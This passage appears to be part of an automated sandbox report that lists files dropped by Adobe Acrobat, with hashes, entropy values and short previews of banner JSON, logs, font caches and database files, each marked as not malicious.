                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"98856_305509ActionBlock_2","campaignId":98856,"containerId":"1","controlGroupId":"","treatmentId":"ac976190-e928-441b-966f-edceed16b659","variationId":"305509"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0xIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWRpdCB0ZXh0LCBpbWFnZXMsIGFuZFxcbiAgaW5zZXJ0IG9yIGRlbGV0ZSBwYWdlcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwid
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.332840966153391
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfzdPeUkwRe9:YvXKXaOUGcmkuGb8Ukee9
                                                                          MD5:E95A6FDA291C5DE3DC938E8111079175
                                                                          SHA1:287979B08BAA7BDBB19D22B1CD62479028781E5B
                                                                          SHA-256:E98A0CA9F5F627AEF04F814A779BDBD8D3A9EA389E84BE24D2540EB28E2FD347
                                                                          SHA-512:25115E97C189AA0005DD9958E7BA23CA52CCC832734EB8E7CF871C8EEE3843CDF51494A3815B42A84B008066C8968377D7AFBF5C23230F117A2F9171BD70B936
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.313470697328321
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfYdPeUkwRe9:YvXKXaOUGcmkuGg8Ukee9
                                                                          MD5:E725523C49C8385ECED55C7FE1B1F482
                                                                          SHA1:12D9F51FCD1734FA7E589D7B7EDB80E95DEDD22C
                                                                          SHA-256:8ADFB2178ECE22602C437391679E6551C57FAF5E7F93E554A305B8C6100E0CD0
                                                                          SHA-512:4A34D043CE2AD39EF2828C36183E83CF6896C19AB6F45DC72DB77708F6F657EAF4935F3248C136365F0487696E8C038E56C14385DF14208B84DF61EE482A0C86
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.300057221243066
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJf+dPeUkwRe9:YvXKXaOUGcmkuG28Ukee9
                                                                          MD5:38EAE87F3BFB5EFB875F10CCF6CFAE65
                                                                          SHA1:9C5622B027009756B4744A8234E53E587C2AC941
                                                                          SHA-256:98EDB2E889401D4219AD43D89CF139FDFB19845BACE6414445C39C6A2741C653
                                                                          SHA-512:197F12670FEE27185E23EADA92FA7BAA6AE254B7BA1395E8D11EF24F0A825C7BF7C502D386C97E8B6F9B07159F735DD9A6B9AC89D1139A9BCD37617EE818BC5E
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.296925212889962
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfbPtdPeUkwRe9:YvXKXaOUGcmkuGDV8Ukee9
                                                                          MD5:3DBFBC89AF0162FFEB02F61361FBD632
                                                                          SHA1:07A1A4BD2FEB0D0395935E6D0F9AF0842CE25633
                                                                          SHA-256:769654F260347E97814A94F1331E73069F197AD936B755B56C798098587EEB4C
                                                                          SHA-512:CD12F0262412F6C142C46667869EC1FFE1E0EAB18EFD40362C7D28AD956B967A4EA418425863DC4A9EB53FC266020F07E64CDDCB07A75CFBD35D48D945161391
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.300178607159918
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJf21rPeUkwRe9:YvXKXaOUGcmkuG+16Ukee9
                                                                          MD5:00BA4DE1EF8694C8ADEA2B57CB43B2B2
                                                                          SHA1:C005CD52CC79AD7EA3AE928A7EEA3D76A16C97CB
                                                                          SHA-256:F60A970179A5E2FCB4281BDDC8116B7202F7BB79CDC6B3C77191D009BFA8E299
                                                                          SHA-512:6348498DF0C889082E2807FD879A045BE575646C14FCBE811CD02F98A623FEADA94E0AE425F6E731517BC922D3C02C5BCB763D293F8648CE9C664502311E96A2
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2046
                                                                          Entropy (8bit):5.8404956609628655
                                                                          Encrypted:false
                                                                          SSDEEP:48:YvvOUfrBgxnahG48jkuDwpphU8oIp0LyTnVX:GvN9gE84+k0w9UupKs
                                                                          MD5:EE466F63BAD3C93AC1A71C5A0E7EFFB2
                                                                          SHA1:56C7A7F11E32522254396CCE4CF51E386F06EB80
                                                                          SHA-256:E941A19A9E541288F74112CE94F793FFE239A0773D9603AD1909A4175A2458B4
                                                                          SHA-512:7C45C01A88153EF5CA4FB5141F260A303DCE927B32EA9BED32CB98BB4D9A1869FA8BE2A7E08DE84DD41A28A33FC9990D4F2CD73E8A523EB89BA906EA00717530
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"98856_305509ActionBlock_0","campaignId":98856,"containerId":"1","controlGroupId":"","treatmentId":"1f103c22-ed64-4898-b33f-705834e67da9","variationId":"305509"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0xIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwsIHNpZ24sIGFuZCBzZW5kIFBERnMuIiwiY3RhTGFiZWwiOm51bGwsImN0YUJlaGF2aW9yIjpudWxsLCJjdGFVcmwiOm51bGwsImN0YVVybFR5cGUiOm51bGwsInRyYWNraW5nSWQiOiJSR1MwM
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.278467608120468
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfshHHrPeUkwRe9:YvXKXaOUGcmkuGUUUkee9
                                                                          MD5:46E75D92212708CDF0AC97416FEFD446
                                                                          SHA1:DBA4CB1A4E5CDEEA0F6E14042CABCC95F2931CD6
                                                                          SHA-256:599D0FD705FDA87C4FED3B9ECF9D2B26050483CE139F621E5FFA86C60E849579
                                                                          SHA-512:4683FCA58240E5681ECAA919D6D942361157F782B595E57B2DB5848B8D7BBDE7CC50C431EA6680ECF67FFFE24C89A7EB118D1CC1E3937E473C69B4F3BF0DE503
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.2851962612837005
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJTqgFCrPeUkwRe9:YvXKXaOUGcmkuGTq16Ukee9
                                                                          MD5:1DA7C6B55B3C941F7BA42F5A1640BF84
                                                                          SHA1:AEC70C7E01A54BB7914BE563988006BB36AF6FFA
                                                                          SHA-256:1AA30B2DE8067E06F297DA507CD1E43E3CBB8FDE3AFF9D3EA6DEBDC5510ED29C
                                                                          SHA-512:C1EB97E29CF1A8C0358992C4DA6BA78AAC6576FF1299A7123E25AE182182EAE2525A26DCEA0E92FAAA38185595C010733897D5E2484C569DEA1C4D0A7ED9DE70
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2815
                                                                          Entropy (8bit):5.111883512685868
                                                                          Encrypted:false
                                                                          SSDEEP:24:Y34hyZPGaTayKJqZRhR6uJSqoBhX2iPjkRvj0SsfVgVC212LSsRC7J55CQM04V6r:Y3p9xS3BhDkR7Y00iJzpMZqq9W
                                                                          MD5:E3EC4C9D1B5ADF766BA0CB29EE21C175
                                                                          SHA1:3AF642C8C58909E9CB3E729F08153D904C0F62EF
                                                                          SHA-256:529D907D2BA47BAC96F2F881B1FEEE4663D19AEAA97FE52E1C79A1553B46DB61
                                                                          SHA-512:8B1995455F76EFE875B5C12B94FB487BBF7FFC7AF1B7F8336CA3837CC1A81BB4D0ED1F738E558160F7C6DE95DC7FD38C1CADB8B6FEAB816527A2023D7FEBCC93
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"633796b1170a8b39cc3f49562cc1b851","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1741109109000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b19c76e60d28a60c51ec4f154dc20e6d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2159,"ts":1741109109000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c0ee292047ba3d2a09453c46d66e17a6","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2046,"ts":1741109109000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"af5be472c5ecbafc5d978fb527e96efd","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2154,"ts":1741109109000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b7c8a7ae7faae44540ce2ecf3c5c21ec","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1741109109000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"0c8c1b6a788cc2caeb5eb089b8dd97d0","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size"
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.1458753178631393
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLhx/XYKQvGJF7ursA3RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcF:TFl2GL7msATXc+XcGNFlRYIX2v3k3V
                                                                          MD5:639EBA24C3061326DA7E19F332B15DE7
                                                                          SHA1:8F78D69EEEF867A28C6C608E6EBB9AFFDDD67C90
                                                                          SHA-256:2278E1F645809AC392740519978C14EAC80AD8168BE2C145D5AD1A5EF24A098B
                                                                          SHA-512:76E77AEF4575F6EA02C4F609024EF83DB093D87F8BE357066883B660F58176F534951D840D9B8E0FB07482FE9187BB904AF4DA53BF09932F115348666CFE8565
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.5507477897384403
                                                                          Encrypted:false
                                                                          SSDEEP:24:7+t4h3UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxOqLxx/XY3:7M4hEXc+XcGNFlRYIX2vHqVl2GL7msm
                                                                          MD5:F6F668545593242182385391BF5DD784
                                                                          SHA1:7F41F687834D296301BD5D226B16D502A2898491
                                                                          SHA-256:9BC1DDBF417FA2D412DA9138543158A974F361B6817EAD386CA9C58C76A705D9
                                                                          SHA-512:BA9E51D0EEEA2DB9DFB478F441CCBF547785F715A48C9F4832C4D1389A095E6E247C44E479E1C8AD10CAF669A634ED0543835B44202DF045894ADF24B408B108
                                                                          Malicious:false
                                                                          Preview:.... .c.....X.,...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgrdzczpe9P1ktuUxlDb+f4DbeYyu:6a6TZ44ADEZzlP19Uxl3+BK
                                                                          MD5:3F886E02AC4E485E26F0261C196BD392
                                                                          SHA1:AAB01DF6D00AC772D51855C67AF80511384C3896
                                                                          SHA-256:0645C4BAB88A604E825D34D0AEB07EB1FCD8AC744890ECDBEA55FB60AB91F60B
                                                                          SHA-512:7F99023908B33D7582D261A08A98532F5CBEB366362A965EB26495889FB837E47B67DF0C84B8AF230855E13F4F871DCF553D48FF88200969CE85687E227B9462
                                                                          Malicious:false
                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.511206980872271
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82+lE3jFYlYH:Qw946cPbiOxDlbYnuRK//35YlYH
                                                                          MD5:4EB3680C1D17F4145EE034985FCF7165
                                                                          SHA1:52F4669ADFB8964315A5CFDE23CCDFD79D554C93
                                                                          SHA-256:0403E6866A93A5298A43722093C3C0E3674FAE77FCE2A6611A27F3DBCE4CF170
                                                                          SHA-512:D8FF907FDAE23D1AC25FE0C5D699C514BF34CC15062CAFB335E1FE1308767F67E2AA01C85CE6838042C7F6613E0E381266198A500F33553A8C5511214CA0E683
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.4./.0.3./.2.0.2.5. . .1.2.:.2.5.:.1.0. .=.=.=.....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PDF document, version 1.6, 0 pages
                                                                          Category:dropped
                                                                          Size (bytes):358
                                                                          Entropy (8bit):5.034852333198913
                                                                          Encrypted:false
                                                                          SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOXztfUQT5tfUQwCSyAAO:IngVMre9T0HQIDmy9g06JXn9xWlX
                                                                          MD5:E88D1B5C32292D6B5658E235B807B7DB
                                                                          SHA1:EB699E92335CCDF3A67CA7B275A6A40C83526327
                                                                          SHA-256:5098BA43ABE55E5A3DCAB15D29EFA087726A0E90B1CB39A2280238A6036694A9
                                                                          SHA-512:E9C481226F704A234EBA7C72017EC75F5F700063D3D76B1F86D12B48452E361367978648081BEA36691752786AAE426993A970E4CF0F343089DEFFDE4E42522A
                                                                          Malicious:false
                                                                          Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<0A80A2756C99D04BA88784C17D2CA1A4><0A80A2756C99D04BA88784C17D2CA1A4>]>>..startxref..127..%%EOF..
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.338264912747007
                                                                          Encrypted:false
                                                                          SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                          MD5:128A51060103D95314048C2F32A15C66
                                                                          SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                          SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                          SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                          Malicious:false
                                                                          Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.35921194031098
                                                                          Encrypted:false
                                                                          SSDEEP:384:m5DI5ik5it5ik5ik5iZ5iUD5B95B65Bq5Bz5B95B85gSQ5gH5nb5nt5nr52N5VUr:m5U555K5h57545rD5b5E5k555T5C5nQu
                                                                          MD5:AE9369EFDE24E290A9250475D0272108
                                                                          SHA1:6184FED7C583140CE8F3B2E1EBF7215BE1340936
                                                                          SHA-256:74D8B4E8E4D3BDBC476FED005EF264CC908F1221164CDC0CFBF392A2D8C1D1A6
                                                                          SHA-512:AA7F527BAEF1947C1AF8C2D5261DC184FB5D7994FB975FFB8715C06AB91C973B5015DC91E334C2299465CE9496F79654E6EC4C5F7848113B2AC800DF9B5B709D
                                                                          Malicious:false
                                                                          Preview:SessionID=8a29806d-0cb7-4c8a-8e1b-3df5191927d5.1741109104732 Timestamp=2025-03-04T12:25:04:732-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8a29806d-0cb7-4c8a-8e1b-3df5191927d5.1741109104732 Timestamp=2025-03-04T12:25:04:733-0500 ThreadID=7428 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8a29806d-0cb7-4c8a-8e1b-3df5191927d5.1741109104732 Timestamp=2025-03-04T12:25:04:733-0500 ThreadID=7428 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8a29806d-0cb7-4c8a-8e1b-3df5191927d5.1741109104732 Timestamp=2025-03-04T12:25:04:733-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8a29806d-0cb7-4c8a-8e1b-3df5191927d5.1741109104732 Timestamp=2025-03-04T12:25:04:733-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="SetConf
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.391931570277858
                                                                          Encrypted:false
                                                                          SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb2cbEIrJcb9:V3fOCIdJDefry
                                                                          MD5:3C99E058C92EFA0CA87B23A83A9CDB8E
                                                                          SHA1:E3B352E0310BB6448A40E9BFD0C0B079B7B32EF1
                                                                          SHA-256:5D14ACC3EF9CB38575F25C4B9D2447903E84C971741B83AB2383A8F6705E4BBB
                                                                          SHA-512:BB2A375D6F90FF5A72023C9124B2A3447D4A87935424CE9FE4F094A4D8132816C4219E4576EBF9421990A9F05DE2B4FF8E0964B0409FD9F457910280B8FB2664
                                                                          Malicious:false
                                                                          Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/yKwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:bwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                                          MD5:D1BC27E013E1129B27D3BE5F4567D495
                                                                          SHA1:D2D1B846698798C80E57917477F7B98054B48925
                                                                          SHA-256:3EF526805CA6690C3E477DFD81BFD4B28B8D82CCA8E3641C3EDA0EC37F332DDC
                                                                          SHA-512:EBCEFA11F5BC59D602D90177B460B0F0DA59534D347FFBAF1A7C78118A3A221A02284E0A34164F6C0710C1B4E88504C4A20DA69AC998B5EE613A017B208316CB
                                                                          Malicious:false
